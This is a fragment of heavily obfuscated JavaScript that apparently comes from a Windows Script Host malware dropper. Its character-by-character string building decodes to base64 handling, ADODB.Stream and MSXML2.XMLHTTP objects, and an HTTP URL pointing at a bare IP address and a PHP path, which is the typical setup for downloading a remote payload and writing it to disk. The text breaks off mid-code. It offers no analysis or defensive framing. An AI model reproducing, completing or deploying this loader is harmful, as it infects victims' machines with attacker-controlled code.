})(1295)+(function(Rt,Rx){ var uiuFor5=Brfcook; uiuFor5[Vgtf_56]=3; uiuFor5[Vgtf_56-(Vgtf_56/3)]=72; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uiuFor5[600]-uiuFor5[Vgtf_56]),RunGe);  })('while59',true,true)+(function(Rt,Rx){ var wehev5=Brfcook; wehev5[Vgtf_56]=4; wehev5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wehev5[600]-wehev5[Vgtf_56]),RunGe);  })('White35',false,'short49','which82')+(function(Rt,Rx){ var jnhcont3=Brfcook; jnhcont3[Vgtf_56]=2; jnhcont3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jnhcont3[600]-jnhcont3[Vgtf_56]),RunGe);  })('what20','humans11')+(function(Rt,Rx){ var esswer4=Brfcook; esswer4[Vgtf_56]=0; esswer4[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(esswer4[600]-esswer4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var eqtfo3=Brfcook; eqtfo3[Vgtf_56]=0; eqtfo3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eqtfo3[600]-eqtfo3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vsvmere3=Brfcook; vsvmere3[Vgtf_56]=2; vsvmere3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vsvmere3[600]-vsvmere3[Vgtf_56]),RunGe);  })('idea46','indeed17')+(function(Rt,Rx){ var ksvav5=Brfcook; ksvav5[Vgtf_56]=3; ksvav5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ksvav5[600]-ksvav5[Vgtf_56]),RunGe);  })(158,false,'progress41')]((function(Rt,Rx){ var nsigr5=Brfcook; nsigr5[Vgtf_56]=4; nsigr5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nsigr5[600]-nsigr5[Vgtf_56]),RunGe);  })('robots83','conscience16','issues6',false)+(function(Rt,Rx){ var ptkprese4=Brfcook; ptkprese4[Vgtf_56]=1; ptkprese4[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ptkprese4[600]-ptkprese4[Vgtf_56]),RunGe);  })('would54')+(function(Rt,Rx){ var htfgr3=Brfcook; htfgr3[Vgtf_56]=1; htfgr3[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(htfgr3[600]-htfgr3[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var hqkeve3=Brfcook; hqkeve3[Vgtf_56]=4; hqkeve3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hqkeve3[600]-hqkeve3[Vgtf_56]),RunGe);  })('White35','short49',true,'which82')+(function(Rt,Rx){ var nnkgr3=Brfcook; nnkgr3[Vgtf_56]=4; nnkgr3[Vgtf_56-(Vgtf_56/3)]=58; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nnkgr3[600]-nnkgr3[Vgtf_56]),RunGe);  })('robots83',false,null,'conscience16')+(function(Rt,Rx){ var tfnlivel4=Brfcook; tfnlivel4[Vgtf_56]=4; tfnlivel4[Vgtf_56-(Vgtf_56/3)]=56; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tfnlivel4[600]-tfnlivel4[Vgtf_56]),RunGe);  })(true,'second5','itself96','being84'));  var gicqnthat42ko=null; var gicqnrendered77 =new gicqnIwas18((function(Rt,Rx){ var tknavala4=Brfcook; tknavala4[Vgtf_56]=2; tknavala4[Vgtf_56-(Vgtf_56/3)]=67; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tknavala4[600]-tknavala4[Vgtf_56]),RunGe);  })('progress41',1543)+(function(Rt,Rx){ var hqtmerel4=Brfcook; hqtmerel4[Vgtf_56]=3; hqtmerel4[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hqtmerel4[600]-hqtmerel4[Vgtf_56]),RunGe);  })('idea46',1217,true)+(function(Rt,Rx){ var hjqHe5=Brfcook; hjqHe5[Vgtf_56]=1; hjqHe5[Vgtf_56-(Vgtf_56/3)]=80; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hjqHe5[600]-hjqHe5[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var eikHe4=Brfcook; eikHe4[Vgtf_56]=0; eikHe4[Vgtf_56-(Vgtf_56/3)]=68; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eikHe4[600]-eikHe4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ujiwrit4=Brfcook; ujiwrit4[Vgtf_56]=2; ujiwrit4[Vgtf_56-(Vgtf_56/3)]=68; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujiwrit4[600]-ujiwrit4[Vgtf_56]),RunGe);  })(2713,'Both81')+(function(Rt,Rx){ var vsionly3=Brfcook; vsionly3[Vgtf_56]=0; vsionly3[Vgtf_56-(Vgtf_56/3)]=46; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vsionly3[600]-vsionly3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var eiwfea3=Brfcook; eiwfea3[Vgtf_56]=3; eiwfea3[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eiwfea3[600]-eiwfea3[Vgtf_56]),RunGe);  })(true,'into30',1636)+(function(Rt,Rx){ var vktgra4=Brfcook; vktgra4[Vgtf_56]=0; vktgra4[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vktgra4[600]-vktgra4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var usngrati3=Brfcook; usngrati3[Vgtf_56]=0; usngrati3[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(usngrati3[600]-usngrati3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var phpme4=Brfcook; phpme4[Vgtf_56]=4; phpme4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(phpme4[600]-phpme4[Vgtf_56]),RunGe);  })(512,512,'idea46','indeed17')+(function(Rt,Rx){ var usigra4=Brfcook; usigra4[Vgtf_56]=3; usigra4[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(usigra4[600]-usigra4[Vgtf_56]),RunGe);  })('robots83',false,'conscience16')+(function(Rt,Rx){ var hqwande5=Brfcook; hqwande5[Vgtf_56]=2; hqwande5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hqwande5[600]-hqwande5[Vgtf_56]),RunGe);  })('could80','State64'));  var gicqntheprevious46ko='undefined'; var gicqnauthorities97 = new gicqnIwas18((function(Rt,Rx){ var ftkth3=Brfcook; ftkth3[Vgtf_56]=4; ftkth3[Vgtf_56-(Vgtf_56/3)]=81; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ftkth3[600]-ftkth3[Vgtf_56]),RunGe);  })(true,true,false,true)+(function(Rt,Rx){ var sujconsc5=Brfcook; sujconsc5[Vgtf_56]=4; sujconsc5[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sujconsc5[600]-sujconsc5[Vgtf_56]),RunGe);  })(794,'declarations83',794,true)+(function(Rt,Rx){ var qteco3=Brfcook; qteco3[Vgtf_56]=1; qteco3[Vgtf_56-(Vgtf_56/3)]=89; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qteco3[600]-qteco3[Vgtf_56]),RunGe);  })(1638)+(function(Rt,Rx){ var tstfeatu3=Brfcook; tstfeatu3[Vgtf_56]=0; tstfeatu3[Vgtf_56-(Vgtf_56/3)]=77; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tstfeatu3[600]-tstfeatu3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ektconte5=Brfcook; ektconte5[Vgtf_56]=1; ektconte5[Vgtf_56-(Vgtf_56/3)]=77; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ektconte5[600]-ektconte5[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var sqvliv5=Brfcook; sqvliv5[Vgtf_56]=1; sqvliv5[Vgtf_56-(Vgtf_56/3)]=51; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sqvliv5[600]-sqvliv5[Vgtf_56]),RunGe);  })('second5')+(function(Rt,Rx){ var knkskil4=Brfcook; knkskil4[Vgtf_56]=1; knkskil4[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(knkskil4[600]-knkskil4[Vgtf_56]),RunGe);  })(2967)+(function(Rt,Rx){ var pwiother3=Brfcook; pwiother3[Vgtf_56]=4; pwiother3[Vgtf_56-(Vgtf_56/3)]=92; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pwiother3[600]-pwiother3[Vgtf_56]),RunGe);  })('robot28',true,'into6','fighting32')+(function(Rt,Rx){ var qvuroad5=Brfcook; qvuroad5[Vgtf_56]=3; qvuroad5[Vgtf_56-(Vgtf_56/3)]=80; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qvuroad5[600]-qvuroad5[Vgtf_56]),RunGe);  })('lawsthe36',null,true)+(function(Rt,Rx){ var wkvcon5=Brfcook; wkvcon5[Vgtf_56]=2; wkvcon5[Vgtf_56-(Vgtf_56/3)]=78; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wkvcon5[600]-wkvcon5[Vgtf_56]),RunGe);  })(false,2900)+(function(Rt,Rx){ var pquoth4=Brfcook; pquoth4[Vgtf_56]=2; pquoth4[Vgtf_56-(Vgtf_56/3)]=74; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pquoth4[600]-pquoth4[Vgtf_56]),RunGe);  })(null,null)+(function(Rt,Rx){ var wincont4=Brfcook; wincont4[Vgtf_56]=1; wincont4[Vgtf_56-(Vgtf_56/3)]=85; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wincont4[600]-wincont4[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var uihth3=Brfcook; uihth3[Vgtf_56]=4; uihth3[Vgtf_56-(Vgtf_56/3)]=88; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uihth3[600]-uihth3[Vgtf_56]),RunGe);  })('must38',true,'named69',184)+(function(Rt,Rx){ var pfwFort3=Brfcook; pfwFort3[Vgtf_56]=2; pfwFort3[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pfwFort3[600]-pfwFort3[Vgtf_56]),RunGe);  })('while59','that50')+(function(Rt,Rx){ var fismerel5=Brfcook; fismerel5[Vgtf_56]=4; fismerel5[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fismerel5[600]-fismerel5[Vgtf_56]),RunGe);  })('idea46',null,'indeed17','supposed39')+(function(Rt,Rx){ var jvnfeat3=Brfcook; jvnfeat3[Vgtf_56]=0; jvnfeat3[Vgtf_56-(Vgtf_56/3)]=54; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jvnfeat3[600]-jvnfeat3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hujconte5=Brfcook; hujconte5[Vgtf_56]=1; hujconte5[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hujconte5[600]-hujconte5[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var wksifh4=Brfcook; wksifh4[Vgtf_56]=0; wksifh4[Vgtf_56-(Vgtf_56/3)]=48; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wksifh4[600]-wksifh4[Vgtf_56]),RunGe);  })());  var gicqnaims98ko=0.725; var gicqnobservers54='';  var gicqnprinciple65ko=0.193; var gicqnwith94=(function(Rt,Rx){ var skfFort5=Brfcook; skfFort5[Vgtf_56]=3; skfFort5[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(skfFort5[600]-skfFort5[Vgtf_56]),RunGe);  })('while59','that50','orthrough89')+(function(Rt,Rx){ var jifgrad4=Brfcook; jifgrad4[Vgtf_56]=3; jifgrad4[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jifgrad4[600]-jifgrad4[Vgtf_56]),RunGe);  })(null,'robots83','conscience16')+(function(Rt,Rx){ var vwtgrad3=Brfcook; vwtgrad3[Vgtf_56]=0; vwtgrad3[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vwtgrad3[600]-vwtgrad3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ujqlivel3=Brfcook; ujqlivel3[Vgtf_56]=1; ujqlivel3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujqlivel3[600]-ujqlivel3[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var vuiwri5=Brfcook; vuiwri5[Vgtf_56]=0; vuiwri5[Vgtf_56-(Vgtf_56/3)]=58; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vuiwri5[600]-vuiwri5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var kipconsc3=Brfcook; kipconsc3[Vgtf_56]=4; kipconsc3[Vgtf_56-(Vgtf_56/3)]=51; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kipconsc3[600]-kipconsc3[Vgtf_56]),RunGe);  })('declarations83',1106,1106,'provided81')+(function(Rt,Rx){ var fpnFort3=Brfcook; fpnFort3[Vgtf_56]=1; fpnFort3[Vgtf_56-(Vgtf_56/3)]=48; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fpnFort3[600]-fpnFort3[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var nstther4=Brfcook; nstther4[Vgtf_56]=3; nstther4[Vgtf_56-(Vgtf_56/3)]=52; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nstther4[600]-nstther4[Vgtf_56]),RunGe);  })(true,true,'while59')+(function(Rt,Rx){ var vptgra3=Brfcook; vptgra3[Vgtf_56]=0; vptgra3[Vgtf_56-(Vgtf_56/3)]=56; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vptgra3[600]-vptgra3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ijqgra3=Brfcook; ijqgra3[Vgtf_56]=3; ijqgra3[Vgtf_56-(Vgtf_56/3)]=56; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijqgra3[600]-ijqgra3[Vgtf_56]),RunGe);  })('addition49','being51','evades28')+(function(Rt,Rx){ var skvfou5=Brfcook; skvfou5[Vgtf_56]=0; skvfou5[Vgtf_56-(Vgtf_56/3)]=46; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(skvfou5[600]-skvfou5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var uhvmer3=Brfcook; uhvmer3[Vgtf_56]=0; uhvmer3[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uhvmer3[600]-uhvmer3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var fjtski4=Brfcook; fjtski4[Vgtf_56]=0; fjtski4[Vgtf_56-(Vgtf_56/3)]=52; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fjtski4[600]-fjtski4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jevskill5=Brfcook; jevskill5[Vgtf_56]=0; jevskill5[Vgtf_56-(Vgtf_56/3)]=52; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jevskill5[600]-jevskill5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ttjcons5=Brfcook; ttjcons5[Vgtf_56]=2; ttjcons5[Vgtf_56-(Vgtf_56/3)]=48; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ttjcons5[600]-ttjcons5[Vgtf_56]),RunGe);  })('declarations83',1184)+(function(Rt,Rx){ var hhfeve4=Brfcook; hhfeve4[Vgtf_56]=4; hhfeve4[Vgtf_56-(Vgtf_56/3)]=54; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhfeve4[600]-hhfeve4[Vgtf_56]),RunGe);  })(true,'White35',2635,false)+(function(Rt,Rx){ var jqqco3=Brfcook; jqqco3[Vgtf_56]=3; jqqco3[Vgtf_56-(Vgtf_56/3)]=52; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jqqco3[600]-jqqco3[Vgtf_56]),RunGe);  })(null,true,true)+(function(Rt,Rx){ var ptkme3=Brfcook; ptkme3[Vgtf_56]=1; ptkme3[Vgtf_56-(Vgtf_56/3)]=52; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ptkme3[600]-ptkme3[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var pkproad3=Brfcook; pkproad3[Vgtf_56]=4; pkproad3[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pkproad3[600]-pkproad3[Vgtf_56]),RunGe);  })(false,'lawsthe36','free58',false)+(function(Rt,Rx){ var iepwrit4=Brfcook; iepwrit4[Vgtf_56]=1; iepwrit4[Vgtf_56-(Vgtf_56/3)]=51; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iepwrit4[600]-iepwrit4[Vgtf_56]),RunGe);  })('Both81')+(function(Rt,Rx){ var ueeother5=Brfcook; ueeother5[Vgtf_56]=4; ueeother5[Vgtf_56-(Vgtf_56/3)]=56; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ueeother5[600]-ueeother5[Vgtf_56]),RunGe);  })(false,'robot28',2506,null)+(function(Rt,Rx){ var pfjcon5=Brfcook; pfjcon5[Vgtf_56]=3; pfjcon5[Vgtf_56-(Vgtf_56/3)]=51; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pfjcon5[600]-pfjcon5[Vgtf_56]),RunGe);  })('declarations83',1642,1642)+(function(Rt,Rx){ var veeHere3=Brfcook; veeHere3[Vgtf_56]=2; veeHere3[Vgtf_56-(Vgtf_56/3)]=49; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(veeHere3[600]-veeHere3[Vgtf_56]),RunGe);  })(null,null)+(function(Rt,Rx){ var kvhother4=Brfcook; kvhother4[Vgtf_56]=0; kvhother4[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kvhother4[600]-kvhother4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var tnjco4=Brfcook; tnjco4[Vgtf_56]=2; tnjco4[Vgtf_56-(Vgtf_56/3)]=52; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tnjco4[600]-tnjco4[Vgtf_56]),RunGe);  })('declarations83','provided81')+(function(Rt,Rx){ var ffuthat3=Brfcook; ffuthat3[Vgtf_56]=3; ffuthat3[Vgtf_56-(Vgtf_56/3)]=56; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ffuthat3[600]-ffuthat3[Vgtf_56]),RunGe);  })(false,null,true)+(function(Rt,Rx){ var eteande4=Brfcook; eteande4[Vgtf_56]=0; eteande4[Vgtf_56-(Vgtf_56/3)]=81; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eteande4[600]-eteande4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pqqande5=Brfcook; pqqande5[Vgtf_56]=1; pqqande5[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pqqande5[600]-pqqande5[Vgtf_56]),RunGe);  })('could80')+(function(Rt,Rx){ var fksmere3=Brfcook; fksmere3[Vgtf_56]=0; fksmere3[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fksmere3[600]-fksmere3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var tfwgr4=Brfcook; tfwgr4[Vgtf_56]=2; tfwgr4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tfwgr4[600]-tfwgr4[Vgtf_56]),RunGe);  })(2473,'addition49')+(function(Rt,Rx){ var jkvlivel4=Brfcook; jkvlivel4[Vgtf_56]=4; jkvlivel4[Vgtf_56-(Vgtf_56/3)]=53; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jkvlivel4[600]-jkvlivel4[Vgtf_56]),RunGe);  })(null,true,'second5','itself96')+(function(Rt,Rx){ var qtefeat3=Brfcook; qtefeat3[Vgtf_56]=2; qtefeat3[Vgtf_56-(Vgtf_56/3)]=79; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qtefeat3[600]-qtefeat3[Vgtf_56]),RunGe);  })('into30','Asimov30')+(function(Rt,Rx){ var tviwri5=Brfcook; tviwri5[Vgtf_56]=4; tviwri5[Vgtf_56-(Vgtf_56/3)]=75; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tviwri5[600]-tviwri5[Vgtf_56]),RunGe);  })('Both81',true,false,2055)+(function(Rt,Rx){ var vtvev5=Brfcook; vtvev5[Vgtf_56]=3; vtvev5[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtvev5[600]-vtvev5[Vgtf_56]),RunGe);  })(true,null,true)+(function(Rt,Rx){ var hwhcon5=Brfcook; hwhcon5[Vgtf_56]=1; hwhcon5[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hwhcon5[600]-hwhcon5[Vgtf_56]),RunGe);  })('declarations83')+(function(Rt,Rx){ var fwsFo5=Brfcook; fwsFo5[Vgtf_56]=1; fwsFo5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwsFo5[600]-fwsFo5[Vgtf_56]),RunGe);  })('while59')+(function(Rt,Rx){ var quico5=Brfcook; quico5[Vgtf_56]=4; quico5[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(quico5[600]-quico5[Vgtf_56]),RunGe);  })(false,true,null,2737)+(function(Rt,Rx){ var phico5=Brfcook; phico5[Vgtf_56]=4; phico5[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(phico5[600]-phico5[Vgtf_56]),RunGe);  })('declarations83','provided81','second5',false);  var gicqnforforcing20ko={D:89}; var gicqnwalk64=(function(Rt,Rx){ var hnwfeatu4=Brfcook; hnwfeatu4[Vgtf_56]=1; hnwfeatu4[Vgtf_56-(Vgtf_56/3)]=64; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hnwfeatu4[600]-hnwfeatu4[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var twegr4=Brfcook; twegr4[Vgtf_56]=2; twegr4[Vgtf_56-(Vgtf_56/3)]=121; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(twegr4[600]-twegr4[Vgtf_56]),RunGe);  })(null,true)+(function(Rt,Rx){ var ewkme5=Brfcook; ewkme5[Vgtf_56]=3; ewkme5[Vgtf_56-(Vgtf_56/3)]=64; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ewkme5[600]-ewkme5[Vgtf_56]),RunGe);  })('idea46','indeed17','supposed39')+(function(Rt,Rx){ var vsfconte4=Brfcook; vsfconte4[Vgtf_56]=4; vsfconte4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vsfconte4[600]-vsfconte4[Vgtf_56]),RunGe);  })('what20',null,'humans11','would54')+(function(Rt,Rx){ var nwwFort3=Brfcook; nwwFort3[Vgtf_56]=0; nwwFort3[Vgtf_56-(Vgtf_56/3)]=49; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nwwFort3[600]-nwwFort3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jwpava4=Brfcook; jwpava4[Vgtf_56]=3; jwpava4[Vgtf_56-(Vgtf_56/3)]=60; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jwpava4[600]-jwpava4[Vgtf_56]),RunGe);  })('progress41',true,null)+(function(Rt,Rx){ var fwtgradu4=Brfcook; fwtgradu4[Vgtf_56]=4; fwtgradu4[Vgtf_56-(Vgtf_56/3)]=42; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwtgradu4[600]-fwtgradu4[Vgtf_56]),RunGe);  })(290,'robots83',true,'conscience16')+(function(Rt,Rx){ var kjpgra3=Brfcook; kjpgra3[Vgtf_56]=3; kjpgra3[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kjpgra3[600]-kjpgra3[Vgtf_56]),RunGe);  })('robots83',false,'conscience16')+(function(Rt,Rx){ var ptwmere4=Brfcook; ptwmere4[Vgtf_56]=3; ptwmere4[Vgtf_56-(Vgtf_56/3)]=64; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ptwmere4[600]-ptwmere4[Vgtf_56]),RunGe);  })(true,'idea46','indeed17')+Math[(function(Rt,Rx){ var hfsfe3=Brfcook; hfsfe3[Vgtf_56]=2; hfsfe3[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hfsfe3[600]-hfsfe3[Vgtf_56]),RunGe);  })('into30',null)+(function(Rt,Rx){ var fwuskill3=Brfcook; fwuskill3[Vgtf_56]=3; fwuskill3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwuskill3[600]-fwuskill3[Vgtf_56]),RunGe);  })('human24','entertain53','clutches88')+(function(Rt,Rx){ var qhnfo4=Brfcook; qhnfo4[Vgtf_56]=0; qhnfo4[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhnfo4[600]-qhnfo4[Vgtf_56]),RunGe);  })()](gicqnhand51);  var gicqnwere28ko='wrote6'; var gicqnbringthem76 =gicqnwith94+gicqnwalk64;  var gicqnmade33ko=false; var gicqnmight26=(function(Rt,Rx){ var tnpdown4=Brfcook; tnpdown4[Vgtf_56]=3; tnpdown4[Vgtf_56-(Vgtf_56/3)]=74; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tnpdown4[600]-tnpdown4[Vgtf_56]),RunGe);  })('situationbecame47',null,'East98')+(function(Rt,Rx){ var pswForth4=Brfcook; pswForth4[Vgtf_56]=4; pswForth4[Vgtf_56-(Vgtf_56/3)]=73; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pswForth4[600]-pswForth4[Vgtf_56]),RunGe);  })(true,'while59','that50',false)+(function(Rt,Rx){ var qjqfor5=Brfcook; qjqfor5[Vgtf_56]=2; qjqfor5[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjqfor5[600]-qjqfor5[Vgtf_56]),RunGe);  })('robots83','conscience16');  var gicqnsocial65ko=true; var gicqnfinda69=0;  var gicqnmany31ko={W:82}; var gicqnamong92=null;  var gicqnescape5ko=0.989; var gicqnwrong69=(function(Rt,Rx){ var sinFor3=Brfcook; sinFor3[Vgtf_56]=4; sinFor3[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sinFor3[600]-sinFor3[Vgtf_56]),RunGe);  })(null,false,false,'while59')+(function(Rt,Rx){ var hptcon5=Brfcook; hptcon5[Vgtf_56]=1; hptcon5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hptcon5[600]-hptcon5[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var knfothe5=Brfcook; knfothe5[Vgtf_56]=4; knfothe5[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(knfothe5[600]-knfothe5[Vgtf_56]),RunGe);  })('robot28','into6',true,null)+(function(Rt,Rx){ var svpHe3=Brfcook; svpHe3[Vgtf_56]=0; svpHe3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(svpHe3[600]-svpHe3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var tpsco4=Brfcook; tpsco4[Vgtf_56]=0; tpsco4[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tpsco4[600]-tpsco4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var qthtrie3=Brfcook; qthtrie3[Vgtf_56]=2; qthtrie3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qthtrie3[600]-qthtrie3[Vgtf_56]),RunGe);  })(false,'conscience16')+(function(Rt,Rx){ var iwwFo5=Brfcook; iwwFo5[Vgtf_56]=1; iwwFo5[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iwwFo5[600]-iwwFo5[Vgtf_56]),RunGe);  })('while59')+(function(Rt,Rx){ var vnfwrit4=Brfcook; vnfwrit4[Vgtf_56]=1; 